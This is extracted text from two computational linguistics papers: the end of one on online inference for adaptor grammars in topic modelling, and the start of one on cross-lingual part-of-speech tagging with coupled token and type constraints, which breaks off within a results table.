... 15-lower ... 19-bill ... 28-committe ... 51-union ... 78-wage ... 382-deduct ... alloc ... club ... Figure 4: The evolution of one topic—concerning tax policy—out of five topics learned using online adaptor grammar inference on the de-news dataset. Each minibatch represents a word processed by this online algorithm; time progresses from left to right. As the algorithm encounters new words (bottom) they can make their way into the topic. The numbers next to words represent their overall rank in the topic. For example, the word “pension” first appeared in mini-batch 100, was ranked at 229 after minibatch 400 and became one of the top 10 words in this topic after 2000 minibatches (tokens).12 Quantitatively, we evaluate three different infer- ence schemes and the INFVOC approach13 on a col- lection of English daily news snippets (de-news).14 We used the InfVoc LDA grammar (Table 1). For all approaches, we train the model with five topics, and evaluate topic coherence (Newman et al., 2009), which correlates well with human ratings of topic interpretability (Chang et al., 2009). We collect the co-occurrence counts from Wikipedia and compute the average pairwise pointwise mutual information (PMI) score between the top 10 ranked words of ev- ery topic. Figure 3 illustrates the PMI score for both approaches. Our approach yields comparable or bet- ter results against all other approaches under most conditions. Qualitatively, Figure 4 shows an example of a topic evolution using online adaptor grammar for the de-news dataset. The topic is about “tax pol- icy”. The topic improves over time; words like “year”, “tax” and “minist(er)” become more promi- nent. More importantly, the online approach discov- 13Available at http://www.umiacs.umd.edu/˜zhaike/. 14The de-news dataset is randomly selected subset of 2.2k English documents from http://homepages.inf.ed.ac. uk/pkoehn/publications/de-news/. It contains 6.5k unique types and over 200k word tokens. Tokenization and stemming provided by NLTK (Bird et al., 2009). ers new words and incorporates them into the topic. For example, “schroeder” (former German chancel- lor) first appeared in minibatch 300, was success- fully picked up by our model, and became one of the top ranked words in the topic. 6 Conclusion Probabilistic modeling is a useful tool in understand- ing unstructured data or data where the structure is latent, like language. However, developing these models is often a difficult process, requiring signifi- cant machine learning expertise. Adaptor grammars offer a flexible and quick way to prototype and test new models. Despite ex- pensive inference, they have been used for topic modeling (Johnson, 2010), discovering perspec- tive (Hardisty et al., 2010), segmentation (Johnson and Goldwater, 2009), and grammar induction (Co- hen et al., 2010). We have presented a new online, hybrid inference scheme for adaptor grammars. Unlike previous ap- proaches, it does not require extensive preprocess- ing. It is also able to faster discover useful structure in text; with further development, these algorithms could further speed the development and application of new nonparametric models to large datasets. Acknowledgments We would like to thank the anonymous reviewers, Kristina Toutanova, Mark Johnson, and Ke Wu for insightful discussions. This work was supported by NSF Grant CCF-1018625. Boyd-Graber is also supported by NSF Grant IIS-1320538. Any opin- ions, findings, conclusions, or recommendations ex- pressed here are those of the authors and do not nec- essarily reflect the view of the sponsor. References Nan Bernstein-Ratner. 1987. The phonology of parent child speech. Children’s language, 6:159–174. Steven Bird, Ewan Klein, and Edward Loper. 2009. Nat- ural Language Processing with Python. O’Reilly Me- dia. Christopher M. Bishop. 2006. Pattern Recognition and Machine Learning. Springer-Verlag New York, Inc., Secaucus, NJ, USA. David M. Blei and Michael I. Jordan. 2005. Variational inference for Dirichlet process mixtures. Journal of Bayesian Analysis, 1(1):121–144. Benjamin Börschinger and Mark Johnson. 2012. Using rejuvenation to improve particle filtering for bayesian word segmentation. In Proceedings of the Association for Computational Linguistics. Léon Bottou. 1998. Online algorithms and stochastic approximations. In Online Learning and Neural Net- works. Cambridge University Press, Cambridge, UK. Jordan Boyd-Graber and David M. Blei. 2007. PUTOP: Turning predominant senses into a topic model for WSD. In 4th International Workshop on Semantic Evaluations. Michael R. Brent and Timothy A. Cartwright. 1996. Dis- tributional regularity and phonotactic constraints are useful for segmentation. volume 61, pages 93–125. Jonathan Chang, Jordan Boyd-Graber, and David M. Blei. 2009. Connections between the lines: Augment- ing social networks with text. In Knowledge Discovery and Data Mining. Jean-Cédric Chappelier and Martin Rajman. 2000. Monte-Carlo sampling for NP-hard maximization problems in the framework of weighted parsing. In Natural Language Processing, pages 106–117. Shay B. Cohen, David M. Blei, and Noah A. Smith. 2010. Variational inference for adaptor grammars. In Conference of the North American Chapter of the As- sociation for Computational Linguistics. Shay B. Cohen. 2011. Computational Learning of Prob- abilistic Grammars in the Unsupervised Setting. Ph.D. thesis, Carnegie Mellon University. Thomas Emerson. 2005. The second international chi- nese word segmentation bakeoff. In Fourth SIGHAN Workshop on Chinese Language, Jeju, Korea. Thomas S. Ferguson. 1973. A Bayesian analysis of some nonparametric problems. The Annals of Statis- tics, 1(2). Sharon Goldwater, Thomas L. Griffiths, and Mark John- son. 2011. Producing power-law distributions and damping word frequencies with two-stage language models. Journal of Machine Learning Research, pages 2335–2382, July. Eric Hardisty, Jordan Boyd-Graber, and Philip Resnik. 2010. Modeling perspective using adaptor grammars. In Proceedings of Emperical Methods in Natural Lan- guage Processing. Matthew Hoffman, David M. Blei, and Francis Bach. 2010. Online learning for latent Dirichlet allocation. In Proceedings of Advances in Neural Information Processing Systems. Matthew Hoffman, David M. Blei, Chong Wang, and John Paisley. 2013. Stochastic variational inference. In Journal of Machine Learning Research. Mark Johnson and Sharon Goldwater. 2009. Improving nonparameteric Bayesian inference: experiments on unsupervised word segmentation with adaptor gram- mars. In Conference of the North American Chapter of the Association for Computational Linguistics. Mark Johnson, Thomas L. Griffiths, and Sharon Goldwa- ter. 2006. Adaptor grammars: A framework for speci- fying compositional nonparametric Bayesian models. In Proceedings of Advances in Neural Information Processing Systems. Mark Johnson, Thomas L. Griffiths, and Sharon Goldwa- ter. 2007. Bayesian inference for PCFGs via Markov chain Monte Carlo. In Conference of the North Ameri- can Chapter of the Association for Computational Lin- guistics. Mark Johnson. 2010. PCFGs, topic models, adaptor grammars and learning topical collocations and the structure of proper names. In Proceedings of the As- sociation for Computational Linguistics. Kenichi Kurihara, Max Welling, and Yee Whye Teh. 2007. Collapsed variational Dirichlet process mixture models. In International Joint Conference on Artifi- cial Intelligence. Christopher D. Manning and Hinrich Schütze. 1999. Foundations of Statistical Natural Language Process- ing. The MIT Press, Cambridge, MA. David Mimno, Matthew Hoffman, and David Blei. 2012. Sparse stochastic inference for latent Dirichlet alloca- tion. In Proceedings of the International Conference of Machine Learning. Daichi Mochihashi, Takeshi Yamada, and Naonori Ueda. 2009. Bayesian unsupervised word segmentation with nested pitman-yor language modeling. In Proceedings of the Association for Computational Linguistics. Peter Müller and Fernando A. Quintana. 2004. Non- parametric Bayesian data analysis. Statistical Science, 19(1). Ramesh Nallapati, William Cohen, and John Lafferty. 2007. Parallelized variational EM for latent Dirichlet allocation: An experimental evaluation of speed and scalability. In ICDMW. David Newman, Sarvnaz Karimi, and Lawrence Cave- don. 2009. External evaluation of topic models. In Proceedings of the Aurstralasian Document Comput- ing Symposium. J. Pitman and M. Yor. 1997. The two-parameter Poisson- Dirichlet distribution derived from a stable subordina- tor. Annals of Probability, 25(2):855–900. Hiroyuki Shindo, Yusuke Miyao, Akinori Fujino, and Masaaki Nagata. 2012. Bayesian symbol-refined tree substitution grammars for syntactic parsing. In Pro- ceedings of the Association for Computational Lin- guistics. Erik B. Sudderth and Michael I. Jordan. 2008. Shared segmentation of natural scenes using depen- dent Pitman-Yor processes. In Proceedings of Ad- vances in Neural Information Processing Systems. Yee Whye Teh, Michael I. Jordan, Matthew J. Beal, and David M. Blei. 2006. Hierarchical Dirichlet pro- cesses. Journal of the American Statistical Associa- tion, 101(476):1566–1581. Kristina Toutanova and Mark Johnson. 2008. A Bayesian LDA-based model for semi-supervised part- of-speech tagging. In Proceedings of Advances in Neural Information Processing Systems, pages 1521– 1528. Martin J. Wainwright and Michael I. Jordan. 2008. Graphical models, exponential families, and varia- tional inference. Foundations and Trends in Machine Learning, 1(1–2):1–305. Chong Wang and David M. Blei. 2012. Truncation-free online variational inference for Bayesian nonparamet- ric models. In Proceedings of Advances in Neural In- formation Processing Systems. Naiwen Xue, Fei Xia, Fu-dong Chiou, and Marta Palmer. 2005. The Penn Chinese TreeBank: Phrase structure annotation of a large corpus. Natural Language Engi- neering. Limin Yao, David Mimno, and Andrew McCallum. 2009. Efficient methods for topic model inference on streaming document collections. In Knowledge Dis- covery and Data Mining. Ke Zhai and Jordan Boyd-Graber. 2013. Online latent Dirichlet allocation with infinite vocabulary. In Pro- ceedings of the International Conference of Machine Learning. Ke Zhai and Jason D. Williams. 2014. Discovering latent structure in task-oriented dialogues. In Proceedings of the Association for Computational Linguistics. Ke Zhai, Jordan Boyd-Graber, Nima Asadi, and Mo- hamad Alkhouja. 2012. Mr. LDA: A flexible large scale topic modeling package using variational infer- ence in mapreduce. In Proceedings of World Wide Web Conference. work_wgi74n6oavhdxhlomowlxqjdhu ---- Transactions of the Association for Computational Linguistics, 1 (2013) 1–12. Action Editor: Sharon Goldwater. Submitted 11/2012; Revised 1/2013; Published 3/2013. c©2013 Association for Computational Linguistics. Token and Type Constraints for Cross-Lingual Part-of-Speech Tagging Oscar Täckström�†∗ Dipanjan Das‡ Slav Petrov‡ Ryan McDonald‡ Joakim Nivre†∗ � Swedish Institute of Computer Science † Department of Linguistics and Philology, Uppsala University ‡ Google Research, New York oscar@sics.se {dipanjand|slav|ryanmcd}@google.com joakim.nivre@lingfil.uu.se Abstract We consider the construction of part-of-speech taggers for resource-poor languages. Recently, manually constructed tag dictionaries from Wiktionary and dictionaries projected via bitext have been used as type constraints to overcome the scarcity of annotated data in this setting. In this paper, we show that additional token constraints can be projected from a resource- rich source language to a resource-poor target language via word-aligned bitext. We present several models to this end; in particular a par- tially observed conditional random field model, where coupled token and type constraints pro- vide a partial signal for training. Averaged across eight previously studied Indo-European languages, our model achieves a 25% relative error reduction over the prior state of the art. We further present successful results on seven additional languages from different families, empirically demonstrating the applicability of coupled token and type constraints across a diverse set of languages. 1 Introduction Supervised part-of-speech (POS) taggers are avail- able for more than twenty languages and achieve ac- curacies of around 95% on in-domain data (Petrov et al., 2012). Thanks to their efficiency and robustness, supervised taggers are routinely employed in many natural language processing applications, such as syn- tactic and semantic parsing, named-entity recognition and machine translation. Unfortunately, the resources required to train supervised taggers are expensive to create and unlikely to exist for the majority of written ∗Work primarily carried out while at Google Research. languages. The necessity of building NLP tools for these resource-poor languages has been part of the motivation for research on unsupervised learning of POS taggers (Christodoulopoulos et al., 2010). In this paper, we instead take a weakly supervised approach towards this problem. Recently, learning POS taggers with type-level tag dictionary constraints has gained popularity. Tag dictionaries, noisily pro- jected via word-aligned bitext, have bridged the gap between purely unsupervised and fully supervised taggers, resulting in an average accuracy of over 83% on a benchmark of eight Indo-European languages (Das and Petrov, 2011). Li et al. (2012) further im- proved upon this result by employing Wiktionary1 as a tag dictionary source, resulting in the hitherto best published result of almost 85% on the same setup. Although the aforementioned weakly supervised approaches have resulted in significant improvements over fully unsupervised approaches, they have not exploited the benefits of token-level cross-lingual projection methods, which are possible with word- aligned bitext between a target language of interest and a resource-rich source language, such as English. This is the setting we consider in this paper (§2). While prior work has successfully considered both token- and type-level projection across word-aligned bitext for estimating the model parameters of genera- tive tagging models (Yarowsky and Ngai, 2001; Xi and Hwa, 2005, inter alia), a key observation under- lying the present work is that token- and type-level information offer different and complementary sig- nals. On the one hand, high confidence token-level projections offer precise constraints on a tag in a particular context. On the other hand, manually cre- 1http://www.wiktionary.org/. 1 ated type-level dictionaries can have broad coverage and do not suffer from word-alignment errors; they can therefore be used to filter systematic as well as random noise in token-level projections. In order to reap these potential benefits, we pro- pose a partially observed conditional random field (CRF) model (Lafferty et al., 2001) that couples to- ken and type constraints in order to guide learning (§3). In essence, the model is given the freedom to push probability mass towards hypotheses consistent with both types of information. This approach is flex- ible: we can use either noisy projected or manually constructed dictionaries to generate type constraints; furthermore, we can incorporate arbitrary features over the input. In addition to standard (contextual) lexical features and transition features, we observe that adding features from a monolingual word cluster- ing (Uszkoreit and Brants, 2008) can significantly im- prove accuracy. While most of these features can also be used in a generative feature-based hidden Markov model (HMM) (Berg-Kirkpatrick et al., 2010), we achieve the best accuracy with a globally normalized discriminative CRF model. To evaluate our approach, we present extensive results on standard publicly available datasets for 15 languages: the eight Indo-European languages pre- viously studied in this context by Das and Petrov (2011) and Li et al. (2012), and seven additional lan- guages from different families, for which no compa- rable study exists. In §4 we compare various features, constraints and model types. Our best model uses type constraints derived from Wiktionary, together with token constraints derived from high-confidence word alignments. When averaged across the eight languages studied by Das and Petrov (2011) and Li et al. (2012), we achieve an accuracy of 88.8%. This is a 25% relative error reduction over the previous state of the art. Averaged across all 15 languages, our model obtains an accuracy of 84.5% compared to 78.5% obtained by a strong generative baseline. Fi- nally, we provide an in depth analysis of the relative contributions of the two types of constraints in §5. 2 Coupling Token and Type Constraints Type-level information has been amply used in weakly supervised POS induction, either via pure manually crafted tag dictionaries (Smith and Eisner, 2005; Ravi and Knight, 2009; Garrette and Baldridge, 2012), noisily projected tag dictionaries (Das and Petrov, 2011) or through crowdsourced lexica, such as Wiktionary (Li et al., 2012). At the other end of the spectrum, there have been efforts that project token-level information across word-aligned bitext (Yarowsky and Ngai, 2001; Xi and Hwa, 2005). How- ever, systems that combine both sources of informa- tion in a single model have yet to be fully explored. The following three subsections outline our overall approach for coupling these two types of information to build robust POS taggers that do not require any direct supervision in the target language. 2.1 Token Constraints For the majority of resource-poor languages, there is at least some bitext with a resource-rich source language; for simplicity, we choose English as our source language in all experiments. It is then nat- ural to consider using a supervised part-of-speech tagger to predict part-of-speech tags for the English side of the bitext. These predicted tags can subse- quently be projected to the target side via automatic word alignments. This approach was pioneered by Yarowsky and Ngai (2001), who used the resulting partial target annotation to estimate the parameters of an HMM. However, due to the automatic nature of the word alignments and the POS tags, there will be significant noise in the projected tags. To conquer this noise, they used very aggressive smoothing tech- niques when training the HMM. Fossum and Abney (2005) used similar token-level projections, but in- stead combined projections from multiple source lan- guages to filter out random projection noise as well as the systematic noise arising from different source language annotations and syntactic divergences. 2.2 Type Constraints It is well known that given a tag dictionary, even if it is incomplete, it is possible to learn accurate POS taggers (Smith and Eisner, 2005; Goldberg et al., 2008; Ravi and Knight, 2009; Naseem et al., 2009). While widely differing in the specific model struc- ture and learning objective, all of these approaches achieve excellent results. Unfortunately, they rely on tag dictionaries extracted directly from the un- derlying treebank data. Such dictionaries provide in depth coverage of the test domain and also list all 2 �� Figure 1: Lattice representation of the inference search space Y(x) for an authentic sentence in Swedish (“The farming products must be pure and must not contain any additives”), after pruning with Wiktionary type constraints. The correct parts of speech are listed underneath each word. Bold nodes show projected token constraints ỹ. Underlined text indicates incorrect tags. The coupled constraints lattice Ŷ(x,ỹ) consists of the bold nodes together with nodes for words that are lacking token constraints; in this case, the coupled constraints lattice thus defines exactly one valid path. inflected forms – both of which are difficult to obtain and unrealistic to expect for resource-poor languages. In contrast, Das and Petrov (2011) automatically create type-level tag dictionaries by aggregating over projected token-level information extracted from bi- text. To handle the noise in these automatic dictionar- ies, they use label propagation on a similarity graph to smooth (and also expand) the label distributions. While their approach produces good results and is applicable to resource-poor languages, it requires a complex multi-stage training procedure including the construction of a large distributional similarity graph. Recently, Li et al. (2012) presented a simple and viable alternative: crowdsourced dictionaries from Wiktionary. While noisy and sparse in nature, Wik- tionary dictionaries are available for 170 languages.2 Furthermore, their quality and coverage is growing continuously (Li et al., 2012). By incorporating type constraints from Wiktionary into the feature-based HMM of Berg-Kirkpatrick et al. (2010), Li et al. were able to obtain the best published results in this setting, surpassing the results of Das and Petrov (2011) on eight Indo-European languages. 2.3 Coupled Constraints Rather than relying exclusively on either token or type constraints, we propose to complement the one with the other during training. For each sentence in our training set, a partially constrained lattice of tag sequences is constructed as follows: 2http://meta.wikimedia.org/wiki/ Wiktionary — October 2012. 1. For each token whose type is not in the tag dic- tionary, we allow the entire tag set. 2. For each token whose type is in the tag dictio- nary, we prune all tags not licensed by the dictio- nary and mark the token as dictionary-pruned. 3. For each token that has a tag projected via a high-confidence bidirectional word alignment: if the projected tag is still present in the lattice, then we prune every tag but the projected tag for that token; if the projected tag is not present in the lattice, which can only happen for dictionary- pruned tokens, then we ignore the projected tag. Figure 1 provides a running example. The lattice shows tags permitted after constraining the words to tags licensed by the dictionary (up until Step 2 from above). There is only a single token “Jordbruk- sprodukterna” (“the farming products”) not in the dictionary; in this case the lattice permits the full set of tags. With token-level projections (Step 3; nodes with bold border in Figure 1), the lattice can be further pruned. In most cases, the projected tag is both correct and is in the dictionary-pruned lattice. We thus successfully disambiguate such tokens and shrink the search space substantially. There are two cases we highlight in order to show where our model can break. First, for the token “Jordbruksprodukterna”, the erroneously projected tag ADJ will eliminate all other tags from the lattice, including the correct tag NOUN. Second, the token “några” (“any”) has a single dictionary entry PRON and is missing the correct tag DET. In the case where 3 DET is the projected tag, we will not add it to the lattice and simply ignore it. This is because we hy- pothesize that the tag dictionary can be trusted more than the tags projected via noisy word alignments. As we will see in §4, taking the union of tags performs worse, which supports this hypothesis. For generative models, such as HMMs (§3.1), we need to define only one lattice. For our best gen- erative model this is the coupled token- and type- constrained lattice.3 At prediction time, in both the discriminative and the generative cases, we find the most likely label sequence using Viterbi decoding. For discriminative models, such as CRFs (§3.2), we need to define two lattices: one that the model moves probability mass towards and another one defining the overall search space (or partition func- tion). In traditional supervised learning without a dictionary, the former is a trivial lattice containing the gold standard tag sequence and the latter is the set of all possible tag sequences spanning the tokens. With our best model, we will move mass towards the coupled token- and type-constrained lattice, such that the model can freely distribute mass across all paths consistent with these constraints. The lattice defining the partition function will be the full set of possible tag sequences when no dictionary is used; when a dictionary is used it will consist of all dictionary- pruned tag sequences (sans Step 3 above; the full set of possibilities shown in Figure 1 for our running example). Figures 2 and 3 provide statistics regarding the supervision coverage and remaining ambiguity. Fig- ure 2 shows that more than two thirds of all tokens in our training data are in Wiktionary. However, there is considerable variation between languages: Spanish has the highest coverage with over 90%, while Turk- ish, an agglutinative language with a vast number of word forms, has less than 50% coverage. Fig- ure 3 shows that there is substantial uncertainty left after pruning with Wiktionary, since tokens are rarely fully disambiguated: 1.3 tags per token are allowed on average for types in Wiktionary. Figure 2 further shows that high-confidence align- ments are available for about half of the tokens for most languages (Japanese is a notable exception with 3Other training methods exist as well, for example, con- trastive estimation (Smith and Eisner, 2005). 0 25 50 75 100 avg bg cs da de el es fr it ja nl pt sl sv tr zh P e rc e n t o f to k e n s c o v e re d Token coverage Wiktionary Projected Projected+Filtered Figure 2: Wiktionary and projection dictionary coverage. Shown is the percentage of tokens in the target side of the bitext that are covered by Wiktionary, that have a projected tag, and that have a projected tag after intersecting the two. 0.0 0.5 1.0 1.5 avg bg cs da de el es fr it ja nl pt sl sv tr zh N u m b e r o f ta g s p e r to k e n Figure 3: Average number of licensed tags per token on the target side of the bitext, for types in Wiktionary. less than 30% of the tokens covered). Intersecting the Wiktionary tags and the projected tags (Step 2 and 3 above) filters out some of the potentially erroneous tags, but preserves the majority of the projected tags; the remaining, presumably more accurate projected tags cover almost half of all tokens, greatly reducing the search space that the learner needs to explore. 3 Models with Coupled Constraints We now formally present how we couple token and type constraints and how we use these coupled con- straints to train probabilistic tagging models. Let x = (x1x2 . . .x|x|) ∈ X denote a sentence, where each token xi ∈V is an instance of a word type from the vocabulary V and let y = (y1y2 . . .y|x|) ∈ Y de- note a tag sequence, where yi ∈T is the tag assigned to token xi and T denotes the set of all possible part- of-speech tags. We denote the lattice of all admissible tag sequences for the sentence x by Y(x). This is the 4 inference search space in which the tagger operates. As we shall see, it is crucial to constrain the size of this lattice in order to simplify learning when only incomplete supervision is available. A tag dictionary maps a word type xj ∈ V to a set of admissible tags T (xj) ⊆ T . For word types not in the dictionary we allow the full set of tags T (while possible, in this paper we do not at- tempt to distinguish closed-class versus open-class words). When provided with a tag dictionary, the lattice of admissible tag sequences for a sentence x is Y(x) = T (x1) ×T (x2) × . . .×T (x|x|). When no tag dictionary is available, we simply have the full lattice Y(x) = T |x|. Let ỹ = (ỹ1ỹ2 . . . ỹ|x|) be the projected tags for the sentence x. Note that {ỹi} = ∅ for tokens without a projected tag. Next, we define a piecewise operator _ that couples ỹ and Y(x) with respect to every sentence index, which results in a token- and type- constrained lattice. The operator behaves as follows, coherent with the high level description in §2.3: T̂ (xi, ỹi) = ỹi _ T (xi) = { {ỹi} if ỹi ∈T (xi) T (xi) otherwise . We denote the token- and type-constrained lattice as Ŷ(x,ỹ) = T̂ (x1, ỹ1)×T̂ (x2, ỹ2)×. . .×T̂ (x|x|, ỹ|x|). Note that when token-level projections are not used, the dictionary-pruned lattice and the lattice with cou- pled constraints are identical, that is Ŷ(x,ỹ) = Y(x). 3.1 HMMs with Coupled Constraints A first-order hidden Markov model (HMM) specifies the joint distribution of a sentence x ∈ X and a tag-sequence y ∈Y(x) as: pβ(x,y) = |x|∏ i=1 pβ(xi | yi)︸︷︷︸ emission pβ(yi | yi−1)︸︷︷︸ transition . We follow the recent trend of using a log-linear parametrization of the emission and the transition distributions, instead of a multinomial parametriza- tion (Chen, 2003). This allows model parameters β to be shared across categorical events, which has been shown to give superior performance (Berg- Kirkpatrick et al., 2010). The categorical emission and transition events are represented by feature vec- tors φ(xi,yi) and φ(yi,yi−1). Each element of the parameter vector β corresponds to a particular fea- ture; the component log-linear distributions are: pβ(xi | yi) = exp ( β>φ(xi,yi) ) ∑ x′i∈V exp (β>φ(x′i,yi)) , and pβ(yi | yi−1) = exp ( β>φ(yi,yi−1) ) ∑ y′i∈T exp (β>φ(y′i,yi−1)) . In maximum-likelihood estimation of the parameters, we seek to maximize the likelihood of the observed parts of the data. For this we need the joint marginal distribution pβ(x,Ŷ(x,ỹ)) of a sentence x, and its coupled constraints lattice Ŷ(x,ỹ), which is obtained by marginalizing over all consistent outputs: pβ(x,Ŷ(x,ỹ)) = ∑ y∈Ŷ(x,ỹ) pβ(x,y) . If there are no projections and no tag dictionary, then Ŷ(x,ỹ) = T |x|, and thus pβ(x,Ŷ(x,ỹ)) = pβ(x), which reduces to fully unsupervised learning. The `2-regularized marginal joint log-likelihood of the constrained training data D = {(x(i), ỹ(i))}ni=1 is: L(β;D) = n∑ i=1 log pβ(x (i),Ŷ(x(i), ỹ(i)))−γ‖β‖22 . (1) We follow Berg-Kirkpatrick et al. (2010) and take a direct gradient approach for optimizing Eq. 1 with L-BFGS (Liu and Nocedal, 1989). We set γ = 1 and run 100 iterations of L-BFGS. One could also em- ploy the Expectation-Maximization (EM) algorithm (Dempster et al., 1977) to optimize this objective, al- though the relative merits of EM versus direct gradi- ent training for these models is still a topic of debate (Berg-Kirkpatrick et al., 2010; Li et al., 2012).4 Note that since the marginal likelihood is non-concave, we are only guaranteed to find a local maximum of Eq. 1. After estimating the model parameters β, the tag- sequence y∗ ∈ Y(x) for a sentence x ∈ X is pre- dicted by choosing the one with maximal joint prob- ability: y∗ ← arg max y∈Y(x) pβ(x,y) . 4We trained the HMM with EM as well, but achieved better results with direct gradient training and hence omit those results. 5 3.2 CRFs with Coupled Constraints Whereas an HMM models the joint probability of the input x ∈X and output y ∈Y(x), using locally normalized component distributions, a conditional random field (CRF) instead models the probability of the output conditioned on the input as a globally nor- malized log-linear distribution (Lafferty et al., 2001): pθ(y | x) = exp ( θ>Φ(x,y) ) ∑ y′∈Y(x) exp (θ >Φ(x,y′)) , where θ is a parameter vector. As for the HMM, Y(x) is not necessarily the full space of possible tag-sequences; specifically, for us, it is the dictionary- pruned lattice without the token constraints. With a first-order Markov assumption, the feature function factors as: Φ(x,y) = |x|∑ i=1 φ(x,yi,yi−1) . This model is more powerful than the HMM in that it can use richer feature definitions, such as joint in- put/transition features and features over a wider input context. We model a marginal conditional probabil- ity, given by the total probability of all tag sequences consistent with the lattice Ŷ(x,ỹ): pθ(Ŷ(x,ỹ) | x) = ∑ y∈Ŷ(x,ỹ) pθ(y | x) . The parameters of this constrained CRF are estimated by maximizing the `2-regularized marginal condi- tional log-likelihood of the constrained data (Riezler et al., 2002): L(θ;D) = n∑ i=1 log pθ(Ŷ(x(i), ỹ(i)) | x(i)) −γ‖θ‖22 . (2) As with Eq. 1, we maximize Eq. 2 with 100 itera- tions of L-BFGS and set γ = 1. In contrast to the HMM, after estimating the model parameters θ, the tag-sequence y∗ ∈ Y(x) for a sentence x ∈ X is chosen as the sequence with the maximal conditional probability: y∗ ← arg max y∈Y(x) pθ(y | x) . 4 Empirical Study We now present a detailed empirical study of the mod- els proposed in the previous sections. In addition to comparing with the state of the art in Das and Petrov (2011) and Li et al. (2012), we present models with several combinations of token and type constraints, additional features incorporating word clusters. Both generative and discriminative models are explored. 4.1 Experimental Setup Before delving into the experimental details, we present our setup and datasets. Languages. We evaluate on eight target languages used in previous work (Das and Petrov, 2011; Li et al., 2012) and on seven additional languages (see Ta- ble 1). While the former eight languages all belong to the Indo-European family, we broaden the coverage to language families more distant from the source language (for example, Chinese, Japanese and Turk- ish). We use the treebanks from the CoNLL shared tasks on dependency parsing (Buchholz and Marsi, 2006; Nivre et al., 2007) for evaluation.5 The two- letter abbreviations from the ISO 639-1 standard are used when referring to these languages in tables and figures. Tagset. In all cases, we map the language-specific POS tags to universal POS tags using the mapping of Petrov et al. (2012).6 Since we use indirect super- vision via projected tags or Wiktionary, the model states induced by all models correspond directly to POS tags, enabling us to compute tagging accuracy without a greedy 1-to-1 or many-to-1 mapping. Bitext. For all experiments, we use English as the source language. Depending on availability, there are between 1M and 5M parallel sentences for each language. The majority of the parallel data is gath- ered automatically from the web using the method of Uszkoreit et al. (2010). We further include data from Europarl (Koehn, 2005) and from the UN par- allel corpus (UN, 2006), for languages covered by these corpora. The English side of the bitext is POS tagged with a standard supervised CRF tagger, trained on the Penn Treebank (Marcus et al., 1993), with tags mapped to universal tags. The parallel sen- 5For French we use the treebank of Abeillé et al. (2003). 6We use version 1.03 of the mappings available at http: //code.google.com/p/universal-pos-tags/. 6 tences are word aligned with the aligner of DeNero and Macherey (2011). Intersected high-confidence alignments (confidence >0.95) are extracted and ag- gregated into projected type-level dictionaries. For purely practical reasons, the training data with token- level projections is created by randomly sampling target-side sentences with a total of 500K tokens. Wiktionary. We use a snapshot of the Wiktionary word definitions, and follow the heuristics of Li et al. (2012) for creating the Wiktionary dictionary by mapping the Wiktionary tags to universal POS tags.7 Features. For all models, we use only an identity feature for tag-pair transitions. We use five features that couple the current tag and the observed word (analogous to the emission in an HMM): word iden- tity, suffixes of up to length 3, and three indicator features that fire when the word starts with a capital letter, contains a hyphen or contains a digit. These are the same features as those used by Das and Petrov (2011). Finally, for some models we add a word cluster feature that couples the current tag and the word cluster identity of the word. These (monolin- gual) word clusters are induced with the exchange algorithm (Uszkoreit and Brants, 2008). We set the number of clusters to 256 across all languages, as this has previously been shown to produce robust results for similar tasks (Turian et al., 2010; Täckström et al., 2012). The clusters for each language are learned on a large monolingual newswire corpus. 4.2 Models with Type Constraints To examine the sole effect of type constraints, we experiment with the HMM, drawing constraints from three different dictionaries. Table 1 compares the per- formance of our models with the best results of Das and Petrov (2011, D&P) and Li et al. (2012, LG&T). As in previous work, training is done exclusively on the training portion of each treebank, stripped of any manual linguistic annotation. We first use all of our parallel data to generate projected tag dictionaries: the English POS tags are projected across word alignments and aggregated to tag distributions for each word type. As in Das and Petrov (2011), the distributions are then filtered with a threshold of 0.2 to remove noisy tags and to create 7The definitions were downloaded on August 31, 2012 from http://toolserver.org/˜enwikt/definitions/. This snapshot is more recent than that used by Li et al. Prior work HMM with type constraints Lang. D&P LG&T YHMMproj. YHMMwik. YHMMunion YHMMunion +C bg – – 84.2 68.1 87.2 87.9 cs – – 75.4 70.2 75.4 79.2 da 83.2 83.3 87.7 82.0 78.4 89.5 de 82.8 85.8 86.6 85.1 80.0 88.3 el 82.5 79.2 83.3 83.8 86.0 83.2 es 84.2 86.4 83.9 83.7 88.3 87.3 fr – – 88.4 75.7 75.6 86.6 it 86.8 86.5 89.0 85.4 89.9 90.6 ja – – 45.2 76.9 74.4 73.7 nl 79.5 86.3 81.7 79.1 83.8 82.7 pt 87.9 84.5 86.7 79.0 83.8 90.4 sl – – 78.7 64.8 82.8 83.4 sv 80.5 86.1 80.6 85.9 85.9 86.7 tr – – 66.2 44.1 65.1 65.7 zh – – 59.2 73.9 63.2 73.0 avg (8) 83.4 84.8 84.9 83.0 84.5 87.3 avg – – 78.5 75.9 80.0 83.2 Table 1: Tagging accuracies for type-constrained HMM models. D&P is the “With LP” model in Table 2 of Das and Petrov (2011), while LG&T is the “SHMM-ME” model in Table 2 of Li et al. (2012). YHMMproj. , YHMMwik. and YHMMunion are HMMs trained solely with type constraints derived from the projected dictionary, Wiktionary and the union of these dictionaries, respectively. YHMMunion +C is equivalent to YHMMunion with additional cluster features. All models are trained on the treebank of each language, stripped of gold labels. Results are averaged over the 8 languages from Das and Petrov (2011), denoted avg (8), as well as over the full set of 15 languages, denoted avg. an unweighted tag dictionary. We call this model YHMMproj. ; its average accuracy of 84.9% on the eight languages is higher than the 83.4% of D&P and on par with LG&T (84.8%).8 Our next model (YHMMwik. ) simply draws type constraints from Wiktionary. It slightly underperforms LG&T (83.0%), presumably because they used a second-order HMM. As a simple extension to these two models, we take the union of the projected dictionary and Wiktionary to con- strain an HMM, which we name YHMMunion . This model performs a little worse on the eight Indo-European languages (84.5), but gives an improvement over the projected dictionary when evaluated across all 15 languages (80.0% vs. 78.5%). 8Our model corresponds to the weaker, “No LP” projection of Das and Petrov (2011). We found that label propagation was only beneficial when small amounts of bitext were available. 7 Token constraints HMM with coupled constraints CRF with coupled constraints Lang. YHMMunion +C+L ỹHMM+C+L ỹCRF+C+L ŶHMMproj. +C+L ŶHMMwik. +C+L ŶHMMunion +C+L ŶCRFproj. +C+L ŶCRFwik. +C+L ŶCRFunion+C+L bg 87.7 77.9 84.1 84.5 83.9 86.7 86.0 87.8 85.4 cs 78.3 65.4 74.9 74.8 81.1 76.9 74.7 80.3** 75.0 da 87.3 80.9 85.1 87.2 85.6 88.1 85.5 88.2* 86.0 de 87.7 81.4 83.3 85.0 89.3 86.7 84.4 90.5** 85.5 el 85.9 81.1 77.8 80.1 87.0 83.9 79.6 89.5** 79.7 es 89.1** 84.1 85.5 83.7 85.9 88.0 85.7 87.1 86.0 